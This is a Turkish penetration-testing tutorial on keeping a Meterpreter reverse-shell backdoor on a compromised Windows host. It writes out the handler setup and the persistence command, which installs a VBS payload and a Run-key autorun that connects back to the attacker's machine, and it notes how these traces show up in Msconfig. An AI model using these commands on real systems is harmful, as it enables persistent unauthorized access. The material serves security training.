Windows Operating System

Meterpreter Persistence Betiğini Kullanarak Bırakılan Arkakapı ile Sürekli Meterpreter Bağlantısının Elde Edilmesi

Yazarı:

02/02/2015

1376

views

Sızma testleri sırasında Windows işletim sistemine yetkili erişim sağlandıktan sonra, gerçekleştirilen adımlardan birisi bağlantının sürekliliğini sağlamaktır. Bu amaçla Meterpreter Persistence betiği kullanılabilir. Bu yazıda, Meterpreter tarafından sunulan Persistence betiği ile Meterpreter bağlantısı elde edilmiş bilgisayara arkakapı bırakılacak ve ele geçirilen bilgisayar ile bağlantı kesilse (bilgisayar yeniden başlasa) bile bağlantının tekrar sağlanabileceği görülecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Bir şekilde (bu örnek için MSF psexec modülü ile) Meterpreter kabuğuna düşülmüş bir bilgisayar aşağıdaki gibidir.

Bu bilgisayarda Persistence post modülü çalıştırılacak ve saldırgana ait Kali makinenin TCP 4567 portuna reverse bir meterpreter bağlantı kurması sağlanacaktır. Bu bağlantının Kali tarafından yakalanması için ayrı bir terminal açılarak “exploit/multi/handler” modülü başlatılır ve ayarları gerçekleştirilir.

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set ExitOnSession false
set LHOST 192.168.0.130
set LPORT 4567
show options

Daha sonra da modül çalıştırılarak listener başlatılır.

exploit -j

Daha önce açılan terminale (psexec modülü ile ilk exploit işleminin başlatıldığı terminal) geri dönülerek Persistence modülü çalıştırılır. Bu modül ile Kali makinenin TCP 4567. portuna meterpreter bağlantısı kurulması hedeflenmektedir.

run persistence -A -X -p 4567 -r 192.168.0.130

Not: Yukarıdaki modül çıktısında da görüldüğü gibi kurban makineye bir VBS (C:UsersTubiAppDataLocalTempRVDJaFoFXmb.vbs) atılmış ve çalıştırılmıştır. Ayrıca bir Autorun (HKLMSoftwareMicrosoftWindowsCurrentVersionRunazgEziBW) da yüklenmiştir.

Bu modül yüklendiğinde, ikinci terminal üzerinde açık olan listener’a bir bağlantı talebi geldiği ve hedef sisteme payload gönderildiği (stage) görülmektedir. Bu payload ile de kurban makineye bağlantı kurulmuş olunur.

İlk terminale geri dönülüp bilgisayar yeniden başlatıldığında ilk terminaldeki bağlantı kopmaktadır:

Aynı zamanda ikinci terminaldeki bağlantı da kopmaktadır:

Bilgisayarın yeniden başlaması tamamlandığında ve oturum açıldığında, ikinci terminale yeniden bir talep gelmekte ve yeni bir stage gönderilmektedir. Böylece oturum açan kullanıcının haklarıyla tekrar bir oturum (Session 2) açılmaktadır:

Meterpreter bağlantısının prosesi incelendiğinde “svchost.exe” adlı bir proses olduğu görülmektedir. Ancak bu proses Windows’un standart prosesi olmadığı da görülmektedir. Bu proses ise, VBS çalıştıran bir Windows uygulaması (“wscript.exe” – Oturum açma/kapama veya yönetimsel amaçlarla oluşturulan betikleri çalıştıran proses) tarafından oluşturulmuştur.

Bunun yanında kullanıcı bilgisayarı yeniden başlatmadan, oturumunu kapattığında (log off) listener bağlantısının (Session 2) da koptuğu görülmektedir. Ancak yeniden oturum açıldığında bağlantının yine oluştuğu (Session 3) görülmektedir.

Persistence modülü başlatıldığı zaman kurban bilgisayarına gönderilen VBS (…RVDJaFoFXmb.vbs) ve Autorun (…azgEziBW) değerleri, kurban bilgisayarındaki System Configuration (Run > Msconfig) penceresi incelendiğinde görülmektedir.